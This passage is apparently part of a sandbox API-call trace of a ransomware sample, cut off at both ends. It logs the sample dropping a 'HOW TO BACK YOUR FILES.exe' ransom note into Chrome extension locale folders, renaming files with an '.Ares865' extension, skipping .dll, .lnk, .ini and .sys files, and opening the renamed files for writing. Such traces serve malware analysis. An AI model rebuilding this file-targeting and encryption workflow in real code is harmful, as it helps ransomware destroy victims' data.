hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=20601) returned 1 [0100.551] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr" [0100.551] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr" [0100.551] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0100.551] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0100.552] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0100.552] GetLastError () returned 0x0 [0100.552] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0100.552] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x83476840, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e1bb8c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e1bb8c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0100.552] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.552] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0100.552] lstrcpyW (in: lpString1=0x2cce528, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0100.552] lstrlenW (lpString="messages.json") returned 13 [0100.552] lstrlenW (lpString="Ares865") returned 7 [0100.553] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0100.553] lstrlenW (lpString=".dll") returned 4 [0100.553] lstrcmpiW (lpString1="messages.json", lpString2=".dll") returned 1 [0100.553] lstrlenW (lpString=".lnk") returned 4 [0100.553] lstrcmpiW (lpString1="messages.json", lpString2=".lnk") returned 1 [0100.553] lstrlenW (lpString=".ini") returned 4 [0100.553] lstrcmpiW (lpString1="messages.json", lpString2=".ini") returned 1 [0100.553] lstrlenW (lpString=".sys") returned 4 [0100.553] lstrcmpiW (lpString1="messages.json", lpString2=".sys") returned 1 [0100.553] lstrlenW (lpString="messages.json") returned 13 [0100.553] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json.Ares865") returned 169 [0100.553] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.554] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.555] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16799) returned 1 [0100.559] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil" [0100.559] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil" [0100.559] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0100.559] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\how to back your files.exe"), bFailIfExists=1) returned 0 [0100.560] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0100.560] GetLastError () returned 0x0 [0100.561] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0100.561] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x83467de0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e1bb8c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e1bb8c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0100.561] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.561] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0100.561] lstrcpyW (in: lpString1=0x2cce52a, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0100.561] lstrlenW (lpString="messages.json") returned 13 [0100.561] lstrlenW (lpString="Ares865") returned 7 [0100.561] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0100.561] lstrlenW (lpString=".dll") returned 4 [0100.561] lstrcmpiW (lpString1="messages.json", lpString2=".dll") returned 1 [0100.561] lstrlenW (lpString=".lnk") returned 4 [0100.561] lstrcmpiW (lpString1="messages.json", lpString2=".lnk") returned 1 [0100.561] lstrlenW (lpString=".ini") returned 4 [0100.561] lstrcmpiW (lpString1="messages.json", lpString2=".ini") returned 1 [0100.561] lstrlenW (lpString=".sys") returned 4 [0100.561] lstrcmpiW (lpString1="messages.json", lpString2=".sys") returned 1 [0100.561] lstrlenW (lpString="messages.json") returned 13 [0100.561] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json.Ares865") returned 170 [0100.562] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.563] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.563] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16514) returned 1 [0100.567] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi" [0100.567] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi" [0100.567] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0100.567] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\how to back your files.exe"), bFailIfExists=1) returned 0 [0100.568] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0100.568] GetLastError () returned 0x0 [0100.568] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0100.568] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x834608b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e1bb8c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e1bb8c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0100.568] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.568] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0100.569] lstrcpyW (in: lpString1=0x2cce528, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0100.569] lstrlenW (lpString="messages.json") returned 13 [0100.569] lstrlenW (lpString="Ares865") returned 7 [0100.569] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0100.569] lstrlenW (lpString=".dll") returned 4 [0100.569] lstrcmpiW (lpString1="messages.json", lpString2=".dll") returned 1 [0100.569] lstrlenW (lpString=".lnk") returned 4 [0100.569] lstrcmpiW (lpString1="messages.json", lpString2=".lnk") returned 1 [0100.569] lstrlenW (lpString=".ini") returned 4 [0100.569] lstrcmpiW (lpString1="messages.json", lpString2=".ini") returned 1 [0100.569] lstrlenW (lpString=".sys") returned 4 [0100.569] lstrcmpiW (lpString1="messages.json", lpString2=".sys") returned 1 [0100.569] lstrlenW (lpString="messages.json") returned 13 [0100.569] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json.Ares865") returned 169 [0100.569] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.570] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.571] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16204) returned 1 [0100.574] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa" [0100.574] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa" [0100.574] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0100.574] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\how to back your files.exe"), bFailIfExists=1) returned 0 [0100.575] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0100.575] GetLastError () returned 0x0 [0100.575] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0100.575] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x83459380, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e1e1a20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e1e1a20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0100.576] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.576] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0100.576] lstrcpyW (in: lpString1=0x2cce528, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0100.576] lstrlenW (lpString="messages.json") returned 13 [0100.576] lstrlenW (lpString="Ares865") returned 7 [0100.576] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0100.576] lstrlenW (lpString=".dll") returned 4 [0100.576] lstrcmpiW (lpString1="messages.json", lpString2=".dll") returned 1 [0100.576] lstrlenW (lpString=".lnk") returned 4 [0100.576] lstrcmpiW (lpString1="messages.json", lpString2=".lnk") returned 1 [0100.576] lstrlenW (lpString=".ini") returned 4 [0100.576] lstrcmpiW (lpString1="messages.json", lpString2=".ini") returned 1 [0100.576] lstrlenW (lpString=".sys") returned 4 [0100.576] lstrcmpiW (lpString1="messages.json", lpString2=".sys") returned 1 [0100.576] lstrlenW (lpString="messages.json") returned 13 [0100.576] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json.Ares865") returned 169 [0100.576] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.578] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.578] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=18165) returned 1 [0100.581] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et" [0100.581] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et" [0100.581] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0100.581] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User 